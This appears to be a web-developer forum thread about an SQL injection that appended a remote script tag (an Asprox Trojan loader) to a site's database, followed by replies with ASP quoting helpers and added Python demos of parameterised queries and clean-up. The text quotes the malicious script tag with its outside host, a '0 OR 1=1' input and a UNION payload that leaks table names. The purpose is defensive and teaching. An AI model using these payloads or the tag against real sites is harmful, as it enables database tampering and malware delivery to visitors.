Hi all
A client of mine is having a problem with their site and when I looked
into the SQL database, I found that most text fields have been altered
and appended with
script src=http://www.westpacsecuresite.com/b.js/script
I've taken out the < so that this shows.
Has anyone seen this? I've seen other sites on the net when I did a
google search. http://www.google.com/search?q=%3Csc...e7&rlz=1I7GGLJ
Has my server been hacked? Any one seen this?
Thanks
<mi*****@lonelyprogrammer.com> wrote in message
news:bc**********************************@m45g2000hsb.googlegroups.com...
Yes, it's a SQL Injection attack that is intended to run scripts on the
computer of anyone who visits your client's site, which download a Trojan
called Asprox. This is nearly always the result of poor programming
practice - failure to validate user input, use parameters and/or HTMLEncode
any user supplied values that are written to a web page.
--
Mike Brind
Microsoft MVP - ASP/ASP.NET
Yep, you've received a nice SQL Injection attack.
So now you get to go through all your pages and find all the places where
you are accepting Request.QueryString and Request.Form values and start both
validating and sanitizing them.
Tedious and time consuming, but pretty easy. Just need to create some
sanitizing functions that you use all over the place.
I tend to use ones like this:
<%
' Wrap a string value in single quotes, doubling any embedded quote so it
' cannot terminate the literal.
Function SQLString( txt )
    SQLString = "'" & Replace( txt, "'", "''" ) & "'"
End Function

' Emit a quoted date literal, or NULL if the value is not a date.
' Note: dt is converted to text in the server's locale, so the format the
' database sees depends on the regional settings of the web server.
Function SQLDate( dt )
    If IsDate(dt) Then
        dt = CDate(dt)
        SQLDate = "'" & dt & "'"
    Else
        SQLDate = "NULL"
    End If
End Function

' Emit a bare number, or NULL if the value is not numeric. This is what
' protects an unquoted numeric context such as WHERE id = ...
Function SQLNumber( num )
    If IsNumeric( num ) Then
        SQLNumber = CStr( CDbl( num ) )
    Else
        SQLNumber = "NULL"
    End If
End Function
%>
And then you replace all your unprotected queries, such as
SQL = "UPDATE table SET foo = '" & foo & "' where id = " & id
with
SQL = "UPDATE table SET foo = " & SQLString(foo) & " WHERE id = " & SQLNumber(id)
And so on.
Oh, yeah...and as Mike pointed out, even all that won't protect you from
people putting <SCRIPT> tags, etc., into (say) <TEXTAREA> input.
So unless you *NEED* to allow HTML in some text fields, use a regular
expression to strip it all out.
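The vulnerable concatenation above, the quoting helpers, and a parameterised query side by side, as an added example that is not code from the thread. It is written in Python against an in-memory SQLite database so it runs anywhere; the table name `news`, its rows and the `INJECTED` marker are constructed for the example. The classic ASP equivalent of the parameterised form is an ADODB.Command with Parameters.Append, and of the output-encoding step is Server.HTMLEncode.

```python
import html
import math
import sqlite3

# Constructed marker: the tag the original post describes, with the < restored.
INJECTED = "<script src=http://www.westpacsecuresite.com/b.js></script>"
CLEAN_ROWS = ["first story", "second story", "third story"]


def make_db():
    """Constructed sample data (not the client's database): one table, three rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, body TEXT)")
    con.executemany("INSERT INTO news (id, body) VALUES (?, ?)",
                    enumerate(CLEAN_ROWS, start=1))
    con.commit()
    return con


def sql_string(txt):
    """Python port of the thread's SQLString(): double embedded quotes, wrap in quotes."""
    return "'" + str(txt).replace("'", "''") + "'"


def sql_number(num):
    """Port of SQLNumber(): only a finite number may reach an unquoted numeric context."""
    try:
        value = float(num)
    except (TypeError, ValueError):
        return "NULL"
    return repr(value) if math.isfinite(value) else "NULL"


def update_concat(con, foo, row_id):
    """The 'before' form from the thread: values pasted straight into the statement."""
    sql = "UPDATE news SET body = '" + foo + "' WHERE id = " + row_id
    con.execute(sql)
    con.commit()


def update_escaped(con, foo, row_id):
    """The thread's fix: every value goes through a quoting helper."""
    sql = "UPDATE news SET body = " + sql_string(foo) + " WHERE id = " + sql_number(row_id)
    con.execute(sql)
    con.commit()


def update_param(con, foo, row_id):
    """Preferred fix: a parameterised statement; the driver never treats data as SQL."""
    con.execute("UPDATE news SET body = ? WHERE id = ?", (foo, row_id))
    con.commit()


def bodies(con):
    return [row[0] for row in con.execute("SELECT body FROM news ORDER BY id")]


def render(body):
    """Output side: encode before writing to the page, so a tag that did get stored is
    shown as text rather than executed by the visitor's browser."""
    return html.escape(body, quote=True)


def demo():
    """Run the same hostile input against all three forms and return what ends up stored."""
    results = {}
    # The id is an unquoted numeric context, so the attacker needs no quote at all.
    hostile_id = "0 OR 1=1"

    con = make_db()
    update_concat(con, INJECTED, hostile_id)    # WHERE id = 0 OR 1=1 -> every row rewritten
    results["concat"] = bodies(con)

    con = make_db()
    update_escaped(con, INJECTED, hostile_id)   # sql_number -> NULL, WHERE matches nothing
    results["escaped"] = bodies(con)

    con = make_db()
    update_param(con, INJECTED, hostile_id)     # bound as text, equal to no integer id
    results["param_hostile"] = bodies(con)

    con = make_db()
    update_param(con, "it's fine", 2)           # a legitimate update still works
    results["param_legit"] = bodies(con)
    return results


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, [render(r) for r in rows])
```

The point the numeric case makes is that quote-escaping alone is not enough: `WHERE id = 0 OR 1=1` contains no quote, which is why the number helper (or, better, a bound parameter) matters as much as the string one. The `render` step is the separate output-side fix Mike refers to: it does not stop the injection, it stops the stored tag from running.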
Hi...
Is there a way for people to be able to get all the table names in your
database using SQL Injection Attacks?
I'm asking since the attacker was able to add SCRIPT tags to tables that
aren't really even used on pages any more.
Thoughts?
Thanks
MU
Yes, it is possible. Grab a coffee: http://www.ngssoftware.com/papers/ad..._injection.pdf
--
Mike Brind
MVP - ASP/ASP.NET
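Why an injected statement can reach tables no page uses any more, and how to find and strip the tag afterwards, as an added example that is not from the thread or the linked paper. It is Python against an in-memory SQLite database; the tables, columns and rows are constructed. Here the catalog is `sqlite_master` plus `PRAGMA table_info`; on SQL Server the same information is in INFORMATION_SCHEMA.TABLES and INFORMATION_SCHEMA.COLUMNS, readable by any query running with the application's login, which is what lets one injected statement walk every text column in the database.

```python
import sqlite3

# Constructed marker: the tag the original post describes, with the < restored.
MARKER = "<script src=http://www.westpacsecuresite.com/b.js></script>"


def make_db():
    """Constructed sample: two tables, one no longer used by any page, both already hit."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    con.execute("CREATE TABLE old_guestbook (id INTEGER PRIMARY KEY, entry TEXT, hits INTEGER)")
    con.execute("INSERT INTO news VALUES (1, 'Hello' || ?, 'text' || ?)", (MARKER, MARKER))
    con.execute("INSERT INTO old_guestbook VALUES (1, 'nice site' || ?, 7)", (MARKER,))
    con.commit()
    return con


def search_vulnerable(con, q):
    """A search page built the way the thread warns against: q is pasted into the SQL."""
    sql = "SELECT title FROM news WHERE title LIKE '%" + q + "%'"
    return [r[0] for r in con.execute(sql)]


def leak_table_names(con):
    """What can be sent through that page: close the literal, UNION in the catalog,
    comment out the rest. The same shape works against INFORMATION_SCHEMA.TABLES."""
    payload = "zzz' UNION SELECT name FROM sqlite_master WHERE type='table' -- "
    return search_vulnerable(con, payload)


def _ident(name):
    """Quote an identifier taken from the catalog; identifiers cannot be bound as parameters."""
    return '"' + name.replace('"', '""') + '"'


def text_columns(con):
    """List every text-typed column in every table, walking the same catalog."""
    cols = []
    for (table,) in con.execute("SELECT name FROM sqlite_master WHERE type='table'"):
        for _cid, name, ctype, *_ in con.execute("PRAGMA table_info(%s)" % _ident(table)):
            ctype = (ctype or "").upper()
            if "TEXT" in ctype or "CHAR" in ctype or "CLOB" in ctype:
                cols.append((table, name))
    return cols


def find_infected(con, marker=MARKER):
    """Count rows per text column containing the injected tag (the value is bound, not pasted)."""
    hits = {}
    for table, col in text_columns(con):
        sql = "SELECT COUNT(*) FROM %s WHERE %s LIKE ?" % (_ident(table), _ident(col))
        n = con.execute(sql, ("%" + marker + "%",)).fetchone()[0]
        if n:
            hits[(table, col)] = n
    return hits


def clean(con, marker=MARKER):
    """Strip the tag from every affected column and return what is left (expect nothing).
    Take a backup first: the original post says the tag was appended to existing text,
    so REPLACE is only safe when marker is exactly the injected string."""
    for table, col in text_columns(con):
        t, c = _ident(table), _ident(col)
        con.execute("UPDATE %s SET %s = REPLACE(%s, ?, '') WHERE %s LIKE ?" % (t, c, c, c),
                    (marker, "%" + marker + "%"))
    con.commit()
    return find_infected(con, marker)


if __name__ == "__main__":
    db = make_db()
    print("tables visible through the search box:", leak_table_names(db))
    print("infected columns:", find_infected(db))
    print("after clean-up:", clean(db))
```

The only place a catalog value is spliced into a statement here is as a quoted identifier, because bind parameters cannot stand in for table or column names; every data value is bound. Cleaning the rows does not close the hole, so it goes together with the input and parameter fixes discussed above, otherwise the same statement simply runs again.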